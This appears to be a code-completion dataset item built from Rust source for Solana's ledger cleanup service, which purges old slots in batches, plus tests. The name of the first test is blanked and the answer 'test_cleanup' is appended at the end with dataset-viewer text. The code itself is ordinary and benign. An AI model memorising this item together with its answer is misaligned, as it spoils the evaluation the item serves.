// Seeing about 1600b/shred, using 2000b/shred for margin, so 200m shreds can be stored in 400gb.
// at 5k shreds/slot at 50k tps, this is 500k slots (~5 hours).
// At idle, 60 shreds/slot this is about 4m slots (18 days)
// This is chosen to allow enough time for
// - A validator to download a snapshot from a peer and boot from it
// - To make sure that if a validator needs to reboot from its own snapshot, it has enough slots locally
// to catch back up to where it was when it stopped
pub const DEFAULT_MAX_LEDGER_SHREDS: u64 = 200_000_000;
// Allow down to 50m, or 3.5 days at idle, 1hr at 50k load, around ~100GB
pub const DEFAULT_MIN_MAX_LEDGER_SHREDS: u64 = 50_000_000;
// Check for removing slots at this interval so we don't purge too often
// and starve other blockstore users.
pub const DEFAULT_PURGE_SLOT_INTERVAL: u64 = 512;
// Remove a limited number of slots at a time, so the operation
// does not take too long and block other blockstore users.
pub const DEFAULT_PURGE_BATCH_SIZE: u64 = 256;
pub struct LedgerCleanupService {
t_cleanup: JoinHandle<()>,
}
impl LedgerCleanupService {
/// Starts the background cleanup service.
///
/// Spawns a thread named "solana-ledger-cleanup" that repeatedly waits for
/// new roots on `new_root_receiver` and purges ledger data so the store
/// stays near `max_ledger_shreds` shreds. The thread exits when `exit` is
/// set or when the root channel disconnects.
pub fn new(
    new_root_receiver: Receiver<Slot>,
    blockstore: Arc<Blockstore>,
    max_ledger_shreds: u64,
    exit: &Arc<AtomicBool>,
) -> Self {
    info!(
        "LedgerCleanupService active. Max Ledger Slots {}",
        max_ledger_shreds
    );
    let exit = exit.clone();
    // Root at which the last purge ran; throttles purging to once per
    // DEFAULT_PURGE_SLOT_INTERVAL slots.
    let mut last_purge_slot = 0;
    let t_cleanup = Builder::new()
        .name("solana-ledger-cleanup".to_string())
        .spawn(move || loop {
            if exit.load(Ordering::Relaxed) {
                break;
            }
            if let Err(e) = Self::cleanup_ledger(
                &new_root_receiver,
                &blockstore,
                max_ledger_shreds,
                &mut last_purge_slot,
                DEFAULT_PURGE_SLOT_INTERVAL,
            ) {
                match e {
                    // Sender dropped: no more roots will arrive, stop.
                    RecvTimeoutError::Disconnected => break,
                    // No root within the timeout: loop and re-check `exit`.
                    RecvTimeoutError::Timeout => (),
                }
            }
        })
        .unwrap();
    Self { t_cleanup }
}
/// Scans slot metadata from the beginning of the ledger and determines how
/// many shreds to purge so roughly `max_ledger_shreds` remain.
///
/// Returns `(num_shreds_to_clean, lowest_slot_to_clean, first_slot)`, or
/// `(0, 0, 0)` when the ledger is empty or already under the limit. Shred
/// counts come from `meta.received` and are approximate: non-full slots may
/// have holes.
fn find_slots_to_clean(
    blockstore: &Arc<Blockstore>,
    root: Slot,
    max_ledger_shreds: u64,
) -> (u64, Slot, Slot) {
    let mut shreds = Vec::new();
    let mut iterate_time = Measure::start("iterate_time");
    let mut total_shreds = 0;
    let mut first_slot = 0;
    for (i, (slot, meta)) in blockstore.slot_meta_iterator(0).unwrap().enumerate() {
        if i == 0 {
            first_slot = slot;
            debug!("purge: searching from slot: {}", slot);
        }
        // Not exact since non-full slots will have holes
        total_shreds += meta.received;
        shreds.push((slot, meta.received));
        if slot > root {
            break;
        }
    }
    iterate_time.stop();
    info!(
        "checking for ledger purge: max_shreds: {} slots: {} total_shreds: {} {}",
        max_ledger_shreds,
        shreds.len(),
        total_shreds,
        iterate_time
    );
    // Nothing to purge if the ledger is empty or under the limit. The
    // emptiness check also guards the `shreds[0]` access below, which would
    // otherwise panic on an empty ledger when max_ledger_shreds == 0.
    if shreds.is_empty() || (total_shreds as u64) < max_ledger_shreds {
        return (0, 0, 0);
    }
    // Walk from the newest slot backwards, accumulating shreds to keep; the
    // slot where the budget is first exceeded becomes the purge boundary.
    let mut cur_shreds = 0;
    let mut lowest_slot_to_clean = shreds[0].0;
    for (slot, num_shreds) in shreds.iter().rev() {
        cur_shreds += *num_shreds as u64;
        if cur_shreds > max_ledger_shreds {
            lowest_slot_to_clean = *slot;
            break;
        }
    }
    (cur_shreds, lowest_slot_to_clean, first_slot)
}
/// Receives the newest root from `new_root_receiver` and, when more than
/// `purge_interval` slots have passed since the last purge, removes old
/// slots so the ledger stays near `max_ledger_shreds` shreds.
///
/// Blocks up to one second waiting for a root, then drains the channel so
/// only the most recent root is used. Purging proceeds in batches of
/// `DEFAULT_PURGE_BATCH_SIZE` slots with a sleep between batches so other
/// blockstore users are not starved.
///
/// # Errors
/// `RecvTimeoutError::Timeout` if no root arrives within the timeout;
/// `RecvTimeoutError::Disconnected` if the sender was dropped.
pub fn cleanup_ledger(
    new_root_receiver: &Receiver<Slot>,
    blockstore: &Arc<Blockstore>,
    max_ledger_shreds: u64,
    last_purge_slot: &mut u64,
    purge_interval: u64,
) -> Result<(), RecvTimeoutError> {
    let mut root = new_root_receiver.recv_timeout(Duration::from_secs(1))?;
    // Drain the channel; act only on the newest root.
    while let Ok(new_root) = new_root_receiver.try_recv() {
        root = new_root;
    }
    // saturating_sub: if a root smaller than `last_purge_slot` ever arrives,
    // plain subtraction would panic in debug builds and wrap to a huge value
    // (forcing a spurious purge) in release builds.
    if root.saturating_sub(*last_purge_slot) > purge_interval {
        let disk_utilization_pre = blockstore.storage_size();
        info!(
            "purge: new root: {} last_purge: {} purge_interval: {} disk: {:?}",
            root, last_purge_slot, purge_interval, disk_utilization_pre
        );
        *last_purge_slot = root;
        let (num_shreds_to_clean, lowest_slot_to_clean, mut first_slot) =
            Self::find_slots_to_clean(blockstore, root, max_ledger_shreds);
        if num_shreds_to_clean > 0 {
            debug!(
                "cleaning up to: {} shreds: {} first: {}",
                lowest_slot_to_clean, num_shreds_to_clean, first_slot
            );
            loop {
                // Purge at most one batch per iteration.
                let current_lowest =
                    std::cmp::min(lowest_slot_to_clean, first_slot + DEFAULT_PURGE_BATCH_SIZE);
                let mut slot_update_time = Measure::start("slot_update");
                // Raise the blockstore's lowest_cleanup_slot before deleting
                // this batch.
                *blockstore.lowest_cleanup_slot.write().unwrap() = current_lowest;
                slot_update_time.stop();
                let mut clean_time = Measure::start("ledger_clean");
                blockstore.purge_slots(first_slot, Some(current_lowest));
                clean_time.stop();
                debug!(
                    "ledger purge {} -> {}: {} {}",
                    first_slot, current_lowest, slot_update_time, clean_time
                );
                first_slot += DEFAULT_PURGE_BATCH_SIZE;
                if current_lowest == lowest_slot_to_clean {
                    break;
                }
                // Yield between batches so other blockstore users progress.
                thread::sleep(Duration::from_millis(500));
            }
        }
        let disk_utilization_post = blockstore.storage_size();
        Self::report_disk_metrics(disk_utilization_pre, disk_utilization_post);
    }
    Ok(())
}
/// Emits a debug datapoint with the ledger's disk usage before and after a
/// purge, plus the delta. Silently skipped if either size query failed.
fn report_disk_metrics(pre: BlockstoreResult<u64>, post: BlockstoreResult<u64>) {
    if let (Ok(pre), Ok(post)) = (pre, post) {
        datapoint_debug!(
            "ledger_disk_utilization",
            ("disk_utilization_pre", pre as i64, i64),
            ("disk_utilization_post", post as i64, i64),
            ("disk_utilization_delta", (pre as i64 - post as i64), i64)
        );
    }
}
/// Blocks until the cleanup thread terminates, returning its join result.
pub fn join(self) -> thread::Result<()> {
    self.t_cleanup.join()
}
}
#[cfg(test)]
mod tests {
use super::*;
use solana_ledger::blockstore::make_many_slot_entries;
use solana_ledger::get_tmp_ledger_path;
use std::sync::mpsc::channel;
#[test]
fn | () {
solana_logger::setup();
let blockstore_path = get_tmp_ledger_path!();
let blockstore = Blockstore::open(&blockstore_path).unwrap();
let (shreds, _) = make_many_slot_entries(0, 50, 5);
blockstore.insert_shreds(shreds, None, false).unwrap();
let blockstore = Arc::new(blockstore);
let (sender, receiver) = channel();
//send a signal to kill all but 5 shreds, which will be in the newest slots
let mut last_purge_slot = 0;
sender.send(50).unwrap();
LedgerCleanupService::cleanup_ledger(&receiver, &blockstore, 5, &mut last_purge_slot, 10)
.unwrap();
//check that 0-40 don't exist
blockstore
.slot_meta_iterator(0)
.unwrap()
.for_each(|(slot, _)| assert!(slot > 40));
drop(blockstore);
Blockstore::destroy(&blockstore_path).expect("Expected successful database destruction");
}
// Benchmark-style test: doubles the number of inserted slots each round and
// logs insert/purge timings to eyeball how cleanup cost scales. Asserts only
// that every cleanup call succeeds.
#[test]
fn test_cleanup_speed() {
    solana_logger::setup();
    let blockstore_path = get_tmp_ledger_path!();
    let mut blockstore = Blockstore::open(&blockstore_path).unwrap();
    // Disable compaction so timings reflect purge work only.
    blockstore.set_no_compaction(true);
    let blockstore = Arc::new(blockstore);
    let (sender, receiver) = channel();
    let mut first_insert = Measure::start("first_insert");
    let initial_slots = 50;
    let initial_entries = 5;
    let (shreds, _) = make_many_slot_entries(0, initial_slots, initial_entries);
    blockstore.insert_shreds(shreds, None, false).unwrap();
    first_insert.stop();
    info!("{}", first_insert);
    let mut last_purge_slot = 0;
    let mut slot = initial_slots;
    let mut num_slots = 6;
    for _ in 0..5 {
        let mut insert_time = Measure::start("insert time");
        let batch_size = 2;
        let batches = num_slots / batch_size;
        for i in 0..batches {
            let (shreds, _) = make_many_slot_entries(slot + i * batch_size, batch_size, 5);
            blockstore.insert_shreds(shreds, None, false).unwrap();
            if i % 100 == 0 {
                info!("inserting..{} of {}", i, batches);
            }
        }
        insert_time.stop();
        let mut time = Measure::start("purge time");
        // Advance the root past everything just inserted, then purge.
        sender.send(slot + num_slots).unwrap();
        LedgerCleanupService::cleanup_ledger(
            &receiver,
            &blockstore,
            initial_slots,
            &mut last_purge_slot,
            10,
        )
        .unwrap();
        time.stop();
        info!(
            "slot: {} size: {} {} {}",
            slot, num_slots, insert_time, time
        );
        slot += num_slots;
        num_slots *= 2;
    }
    drop(blockstore);
    Blockstore::destroy(&blockstore_path).expect("Expected successful database destruction");
}
}
| test_cleanup | identifier_name |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.